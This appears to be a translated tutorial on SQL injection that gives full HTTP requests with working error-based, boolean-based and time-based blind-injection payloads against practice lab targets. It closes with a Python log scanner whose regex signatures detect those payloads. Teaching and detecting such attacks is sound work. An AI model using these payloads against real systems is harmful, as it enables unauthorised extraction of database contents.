WEB Vulnerabilities: SQL Injection, Query Methods and Error-Based/Blind Injection

During SQL injection, many injection points produce no echo. One common reason for the missing echo is the way the SQL statement is queried; in that case we have to fall back on error-based or blind injection for the subsequent steps. Also, when injecting manually, knowing or predicting roughly how the SQL statement is written in advance makes it easier to choose the matching injection payload.


SQL Injection: Error-Based and Blind Injection

Blind injection means that during the injection process the retrieved data is not echoed back to the front-end page. In that case we have to use other methods to make inferences or trial attempts; this process is called blind injection. Blind injection falls into the following three categories:

  • Error-based SQL blind injection, error echo (priority 1): floor, updatexml, extractvalue
  • Boolean-based SQL blind injection, logical judgment (priority 2): regexp, like, ascii, left, ord, mid
  • Time-based SQL blind injection, delay judgment (priority 3): if, sleep

Error-Based SQL Blind Injection: Error Echo


  • Capture the request with Burp and test the injection manually


  • XPATH error: updatexml()

POST /vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 192.168.50.10:82
Content-Length: 136
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:82/vul/sqli/sqli_iu/sqli_reg.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close

username=admin' and updatexml(1,concat('^',(select database()),'^'),1) and '1'='1&password=test&sex=&phonenum=&email=&add=&submit=submit


  • group by duplicate-key conflict: this exploits the combination of rand() and group by aggregation. When the derived column is generated and then grouped, a duplicate key is produced that makes the SQL statement raise an error. Because rand() is involved, whether the error occurs is random.

POST /vul/sqli/sqli_iu/sqli_reg.php HTTP/1.1
Host: 192.168.50.10:82
Content-Length: 240
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.50.10:82
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.50.10:82/vul/sqli/sqli_iu/sqli_reg.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close

username=admin' or (select 1 from (select count(*),concat((select version() from information_schema.tables limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a) or '&password=test&sex=&phonenum=&email=&add=&submit=submit

Boolean-Based SQL Blind Injection: Logical Judgment

The page only returns two kinds of response, a True page and a False page. By using the difference between the returned pages, the data is guessed one piece at a time.

  • If the current database name database() has length 8, the True page is returned, otherwise the False page


GET /Less-8/?id=1' and (length(database()))=8 --+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close

  • Guess the first character of the current database name using binary search: 115 gives FALSE and 114 gives TRUE, so the ASCII code of the first character is 115, i.e. 's'. Likewise, changing the payload to substr(database(),2,1) guesses the second character, and so on. Of course, before guessing the characters you can first guess the length of the database name with length(database()).


GET /Less-8/?id=1' and ascii(substr(database(),1,1))=115--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3e01fb025ef845c47223f04db0b283f7
Connection: close
  • Other blind-injection statements

like 'ro%'                       # checks whether the value is ro or starts with ro...
regexp '^xiaodi[1-z]'            # matches xiaodi, xiaodi1..., etc.
if(condition,5,0)                # if the condition holds, returns 5, otherwise returns 0
sleep(5)                         # delays execution of the SQL statement by 5 seconds
mid(a,b,c)                       # takes c characters of string a starting at position b
substr(a,b,c)                    # takes c characters of string a starting at position b
left(database(),1),database()    # left(a,b) takes the first b characters of a from the left
length(database())=8             # checks the length of the database name database()
ord=ascii ascii(x)=97            # ord() is equivalent to ascii(); checks whether the ASCII code of x equals 97

Time-Based SQL Blind Injection: Delay Judgment

This uses the delaying effect of the sleep() statement and takes the response time as the judgment criterion.

and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+
and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(3),0)--+
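As an added example (not code from the original post), the following Python request-log scanner flags the three payload families shown above (error-based, boolean-based and time-based) so that a defender can spot this kind of probing in web server or WAF logs. The SIGNATURES table and the sample log lines are constructed for illustration; the signatures are only indicators, not proof of a successful injection.

```python
import re
from urllib.parse import unquote_plus

# Regex signatures for the three blind-injection families discussed above. They are matched
# against the URL-decoded, lower-cased, whitespace-collapsed request text, so %20 or + encoding
# does not hide the keywords. Constructed for illustration; tune before production use.
SIGNATURES = {
    "error-based": [
        r"\bupdatexml\s*\(",                       # XPATH error via updatexml()
        r"\bextractvalue\s*\(",                    # XPATH error via extractvalue()
        r"\bfloor\s*\(\s*rand\s*\(",               # floor(rand()*2) ... group by
    ],
    "boolean-based": [
        r"\bascii\s*\(\s*(substr|mid|left)\s*\(",  # ascii(substr(database(),1,1))=115
        r"\blength\s*\(\s*database\s*\(",          # length(database())=8
        r"\b(regexp|like)\s+'[^']*'",              # regexp '^...' / like 'ro%'
    ],
    "time-based": [
        r"\bsleep\s*\(\s*\d+\s*\)",                # sleep(5) inside if(...)
    ],
}

def normalize(request_text: str) -> str:
    """URL-decode (+ becomes a space, so '--+' ends up as '-- '), lower-case, collapse spaces."""
    return re.sub(r"\s+", " ", unquote_plus(request_text).lower())

def classify(request_text: str) -> list:
    """Return the injection families whose signatures match this request (empty if clean)."""
    text = normalize(request_text)
    return [family for family, patterns in SIGNATURES.items()
            if any(re.search(p, text) for p in patterns)]

def scan_log(lines) -> list:
    """Return (line_number, families) for every flagged line; benign lines are skipped."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, families) for n, families in hits if families]

# Constructed sample log: one request line (plus the POST body, where relevant) per entry.
SAMPLE_LOG = [
    "GET /Less-8/?id=1'%20and%20(length(database()))=8%20--+ HTTP/1.1",
    "GET /Less-8/?id=1'%20and%20ascii(substr(database(),1,1))=115--+ HTTP/1.1",
    "POST /vul/sqli/sqli_iu/sqli_reg.php username=admin'%20and%20updatexml(1,concat('^',(select%20database()),'^'),1)%20and%20'1'='1",
    "POST /vul/sqli/sqli_iu/sqli_reg.php username=admin'%20or%20(select%201%20from%20(select%20count(*),concat((select%20version()%20from%20information_schema.tables%20limit%200,1),floor(rand()*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20'",
    "GET /Less-8/?id=1'%20and%20if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ HTTP/1.1",
    "GET /Less-8/?id=1 HTTP/1.1",
    "GET /index.php HTTP/1.1 \"Mozilla/5.0 (KHTML, like Gecko)\"",
]
```

Calling scan_log(SAMPLE_LOG) flags entries 1 to 5 and leaves the two benign entries alone; entry 5 is reported as both boolean-based and time-based because it combines ascii(substr(...)) with sleep(5).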
